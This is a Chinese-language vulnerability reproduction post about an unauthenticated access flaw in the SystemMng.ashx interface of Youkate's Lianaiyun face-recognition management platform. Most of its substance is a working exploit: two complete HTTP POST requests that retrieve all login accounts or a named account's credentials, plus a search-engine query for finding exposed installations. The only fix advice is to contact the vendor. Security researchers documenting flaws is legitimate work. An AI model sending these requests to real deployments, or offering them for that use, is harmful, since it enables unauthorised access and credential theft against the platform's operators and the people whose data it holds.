【漏洞复现】优卡特脸爱云一脸通智慧管理平台未授权漏洞

发布时间:2024年01月11日

Nx01 产品简介

????????脸爱云一脸通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的一脸通系统。无需安装,只需在后台配置即可在浏览器登录。? 功能包括:系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。

Nx02 漏洞描述

????????深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台存在未授权漏洞。SystemMng.ashx接口下存在多个未授权操作,攻击者可以利用该漏洞获取当前系统用户名密码等敏感信息。

Nx03 产品主页

web.body="View/UserReserved/UserReservedTest.aspx"

Nx04 漏洞复现

POC1:

POST /SystemMng.ashx HTTP/1.1
Host: {{Hostname}}
Content-Length: 91
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

page=1&arr_search=%7B%22username%22%3A%22%22%2C%22memo%22%3A%22%22%7D&funcName=getOperators

获取全部登录账户信息。

POC2:

POST /SystemMng.ashx HTTP/1.1
Host: {{Hostname}}
Content-Length: 36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=admin&funcName=SelOperators

获取指定账户信息。

Nx05 修复建议

建议联系软件厂商进行处理。

文章来源:https://blog.csdn.net/qq_37113223/article/details/135532618
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。